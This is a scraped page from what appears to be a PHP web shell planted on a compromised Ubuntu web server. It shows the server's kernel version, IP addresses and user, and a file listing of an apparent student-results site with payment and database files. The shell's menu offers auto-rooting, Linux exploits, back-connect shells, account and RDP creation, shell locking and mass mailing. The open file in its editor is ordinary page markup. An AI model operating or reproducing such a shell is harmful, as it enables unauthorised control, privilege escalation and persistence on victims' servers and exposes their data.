Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.186.132
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
results /
rcub_old /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
copyinoasis
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
jquery-ui-1.9
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
razorpay
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tarka_pdf
[ DIR ]
drwxr-xr-x
adds.jpg
39.03
KB
-rwxr-xr-x
adds1.jpg
293.14
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.43
KB
-rwxr-xr-x
cconfig_old.php
1.12
KB
-rwxr-xr-x
db.sql
11.87
KB
-rwxr-xr-x
index.php
5.46
KB
-rwxr-xr-x
index17042018.php
5.45
KB
-rwxr-xr-x
index_13112017.php
4.33
KB
-rwxr-xr-x
index_stop.php
4.62
KB
-rwxr-xr-x
pgResponse.php
5.35
KB
-rwxr-xr-x
rcub_razorpay.csv
67
B
-rwxr-xr-x
result.php
3.33
KB
-rwxr-xr-x
result_17042018.php
3.11
KB
-rwxr-xr-x
subjectDetails.php
1.14
KB
-rwxr-xr-x
verify.php
5.24
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : subjectDetails.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="shortcut icon" type="image/jpg" href="img/favicon.jpg" /> <?php require_once("links/js_files.php");?> <script type="text/javascript"> $(function(){ $('.index_label_div').corner("5px").css("border","1px solid #336699"); $('.messageboard-div').corner("5px").css("border","1px solid #336699"); $('.submit_div_button').corner("5px"); $('.div_app_form_center_blue').corner("5px").css("border","1px solid #336699"); url_object=GetUrlParameters(); var r=url_object['r']; var e=url_object['e']; $("#result_error_div").hide(); DisplayStudentsubjectDetailsResult(r,e); }); </script> </head> <body > <div id='main_frame'> <div class='header_main_div'> <?php require_once("links/header.php");?> <div id="index_main_page_result"> <div id='result_error_div' style='display:none;'> </div> <div id='result_success_div'></div> </div> <?php require_once("links/footer.php");?> </div> </div> </br> </body> </html>
Close